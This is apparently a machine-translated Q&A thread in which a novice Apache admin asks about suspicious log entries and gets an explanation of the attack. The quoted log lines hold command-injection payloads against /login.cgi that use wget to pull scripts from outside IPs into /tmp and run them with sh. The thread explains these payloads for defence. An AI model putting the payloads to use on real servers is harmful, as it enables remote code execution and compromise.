Rob*_* KN 1 security monitoring login hacking apache-2.4
我正在构建一个新服务器Apache,实际上我正在学习,所以我正在尝试不同的东西。我的安全系统已经完成,但当然我可能会遗漏一些东西,或者,如果没有,我明白今天没有任何系统可以 100% 保护我。那么,为什么我认为有人尝试过我,只是因为我在日志中收到了以下信息:
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
还有更多。我知道有人收到错误 400,这对我来说还不错。所以,实际上我的问题不是他们是否尝试我,因为我认为是,因为这似乎不是对我网站的正常请求。我想得到这个请求的解释来理解和学习。他们实际上想做什么,找到我的登录系统并将其发送给某个人?
PS我已经知道wget你可以下载一些网站,我还发现这login.cgi是一个基于cookie的身份验证程序。
谢谢!
您不受欢迎的访问者并没有试图隐藏他在您的服务器上下载和运行某些脚本的尝试。
他可能会期望,不仅你有这样的login.cgi脚本,它也没有正确处理它的输入,因此直接执行撇号之后的所有内容(%27在编码日志中)。您可能没有这种易受攻击的脚本,但是 HTTP 代码 400 总是意味着您不受影响的假设是没有根据的。
这很可能是针对大量随机目标的无人值守攻击。人们只能推测要下载和执行的脚本可能包含什么。可以安全地假设您将无法确定这一点,因为交付脚本的服务器通常会提供不同的脚本(+),具体取决于它是假设攻击到目前为止是成功的,还是正在被调查。
攻击者也完全有可能认为代码执行不太可能,而他只是在您的系统上收集信息。所有面向 Internet 的设备都应该定期收到此类请求,并且您的 Web 服务器上的所有脚本都应该以您永远不必担心的方式编写。
(+)为什么攻击者会提供不同的脚本?使调查妥协后特权升级变得更加困难。该脚本稍后可能会从内存中丢失,因此确保受害者以后无法检索该脚本对攻击者来说是有意义的。如何攻击者会提供不同的脚本吗?他将确保 Web 服务器仅在攻击发生后不久回复来自被攻击机器 IP 的攻击负载。由于攻击只能立即成功或失败,因此以后对脚本的任何检索都可以归因于受害者取证团队或安全研究人员。这不是一种新的或纯粹的理论机制,我在 2016 年确实收到了基于 IP 的不同有效载荷(一个脚本为空,另一个包含加载第三阶段有效载荷的命令)。
| 归档时间: |
|
| 查看次数: |
5426 次 |
| 最近记录: |